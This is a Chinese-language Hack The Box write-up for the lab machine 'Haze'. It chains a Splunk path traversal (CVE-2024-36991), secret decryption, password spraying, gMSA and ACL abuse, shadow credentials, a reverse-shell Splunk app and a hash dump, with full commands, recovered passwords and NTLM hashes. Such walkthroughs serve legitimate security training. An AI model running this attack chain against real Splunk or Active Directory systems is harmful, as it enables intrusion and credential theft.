基本信息

https://app.hackthebox.com/machines/Haze
10.10.11.61

端口扫描

Splunk相关端口和常规域端口

$ nmap -sC -sV -Pn 10.10.11.61
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 12:18 CST
Nmap scan report for 10.10.11.61
Host is up (0.070s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-31 12:00:08Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open  http          Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp open  ssl/http      Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-title: 404 Not Found
| http-robots.txt: 1 disallowed entry
|_/
8089/tcp open  ssl/http      Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-server-header: Splunkd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry
|_/
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 7h41m12s
| smb2-time:
|   date: 2025-03-31T12:00:51
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.80 seconds

Splunk

8000端口是splunk web：

CVE-2024-36991

常规扫描及搜索splunk相关漏洞可以找到：

1
2
3

nuclei -target http://10.10.11.61:8000/

[CVE-2024-36991] [http] [high] http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini

bigb0x/CVE-2024-36991: POC for CVE-2024-36991: This exploit will attempt to read Splunk /etc/passwd file.
https://github.com/bigb0x/CVE-2024-36991

运行得到一些hash：

python3 CVE-2024-36991.py -u http://10.10.11.61:8000/

:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152

splunksecrets

得到的hash不能破解，搜索可以找到工具：

HurricaneLabs/splunksecrets: splunksecrets is a tool for working with Splunk secrets offline
https://github.com/HurricaneLabs/splunksecrets

这个工具使用splunk的secret来解密配置文件中的密码hash：

curl -s "http:/10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk//etc/auth/splunk.secret"

NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

curl -s "http:/10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk//etc/system/local/authentication.conf"
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=

解密得到一个密码：

pip3 install splunksecrets

$ splunksecrets splunk-decrypt -S secret
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24

Paul Taylor

根据从配置文件中得到的用户名密码，对用户名进行变形确认格式为paul.taylor：

1	nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'

users

获取用户名之类信息：

nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute 10000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
serio$

mark.adams

密码喷洒可以发现mark.adams也使用这个密码：

nxc smb haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success

SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.10.11.61     445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24

bloodhound

常规收集bloodhound：

1	bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.10.11.61 -c All --zip

mark.adams to Haze-IT-Backup

mark.adams是gMSA_Managers，常规检查gmsa,但得到的结果是空的：

1
2
3

nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa

LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM:

但可以知道gmsa的目标账户是Haze-IT-Backup$，所以再手动设置一下，然后重新运行，可以正常获取到gmsa：

Exploitation - ACL exploiting | InfoSec Notes
https://notes.qazeer.io/active-directory/exploitation-acl_exploiting#group-managed-service-accounts-gmsa

# 操作要快，有自动清理
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
$user = Get-ADUser -Identity "mark.adams"
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName

nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa

LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM: 735c02c6b2dc54c3c8c6891f55279ebc

Haze-IT-Backup to edward.martin

Haze-IT-Backup对SUPPORT_SERVICES有WriteOwner权限：

WriteOwner & AddMember

尝试修改自己为owner后修改权限，添加成员到该组中：

bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -p ':735C02C6B2DC54C3C8C6891F55279EBC' set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
bloodyAD --host 10.10.11.61 -d haze.htb -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
bloodyAD --host 10.10.11.61 -d haze.htb -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" add groupMember 'SUPPORT_SERVICES' 'mark.adams'
bloodyAD --host 10.10.11.61 -d haze.htb -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" add groupMember 'SUPPORT_SERVICES' 'edward.martin'

edward.martin

再次运行bloodhound，发现到edward.martin的AddKeyCredentialLink

1	bloodhound-python -u 'Haze-IT-Backup$' --hashes 'aad3b435b51404eeaad3b435b51404ee:735c02c6b2dc54c3c8c6891f55279ebc' -d 'haze.htb' -ns 10.10.11.61 --zip -c All -dc 'dc01.haze.htb'

所以就是常规影子证书：

bloodyAD --host 10.10.11.61 -d haze.htb -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" add groupMember 'SUPPORT_SERVICES' 'Haze-IT-Backup$'

python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H '735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action "add"

faketime "$(curl -sik http://10.10.11.61:8000 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

python3 PKINITtools/gettgtpkinit.py -cert-pfx 'xf33OrUn.pfx' -pfx-pass 38FV5F9iB5saBqUXUIVS  'HAZE.HTB/edward.martin' edward.martin.ccache

python3 PKINITtools/getnthash.py -key 7aafb6f546c02459e6b0ca9730323aceb099fb685a1ac07775116aa83248c450 'HAZE.HTB/edward.martin'
export KRB5CCNAME=edward.martin.ccache
python3 PKINITtools/getnthash.py -key 7aafb6f546c02459e6b0ca9730323aceb099fb685a1ac07775116aa83248c450 'HAZE.HTB/edward.martin'

Recovered NT Hash
09e0b3eeb2e7a6b0d419e9ff8f4d91af

user flag

使用得到的edward.martin hash登录：

1	evil-winrm -i haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'

Backups

edward.martin是Backup_Reviewers组成员,可以查看根目录backups中相关文件:

1	Evil-WinRM PS C:\Backups\Splunk> download splunk_backup_2024-08-06.zip

splunk

之后就是和前面相同的方式，文件中获取secret和hash，解密：

var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf

bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=

etc/auth/splunk.secret

CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B

$ splunksecrets splunk-decrypt -S secret2
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24

Splunk to alexander.green

得到的密码可以登录到splunk web：

1 2	admin Sp1unkadmin@2k24

然后就是安装恶意程序，获取alexander.green shell：

0xjpuff/reverse_shell_splunk: A simple splunk package for obtaining reverse shells on both Windows and most *nix systems.
https://github.com/0xjpuff/reverse_shell_splunk

提权 & root flag

alexander.green有SeImpersonatePrivilege，上个meterpreter一键getsystem：

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:06dc954d32cb91ac2831d67e3e12027f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:937e28202a6cdfcc556d1b677bcbe82c:::
paul.taylor:1103:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
mark.adams:1104:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
edward.martin:1105:aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af:::
alexander.green:1106:aad3b435b51404eeaad3b435b51404ee:6b8caa0cd4f8cb8ddf2b5677a24cc510:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9dcbc33adec3bdc8b2334060002ce1b4:::
Haze-IT-Backup$:1111:aad3b435b51404eeaad3b435b51404ee:735c02c6b2dc54c3c8c6891f55279ebc:::

参考资料

bigb0x/CVE-2024-36991: POC for CVE-2024-36991: This exploit will attempt to read Splunk /etc/passwd file.
https://github.com/bigb0x/CVE-2024-36991
HurricaneLabs/splunksecrets: splunksecrets is a tool for working with Splunk secrets offline
https://github.com/HurricaneLabs/splunksecrets
Exploitation - ACL exploiting | InfoSec Notes
https://notes.qazeer.io/active-directory/exploitation-acl_exploiting#group-managed-service-accounts-gmsa
0xjpuff/reverse_shell_splunk: A simple splunk package for obtaining reverse shells on both Windows and most *nix systems.
https://github.com/0xjpuff/reverse_shell_splunk

Haze - HackTheBox

2025-03-31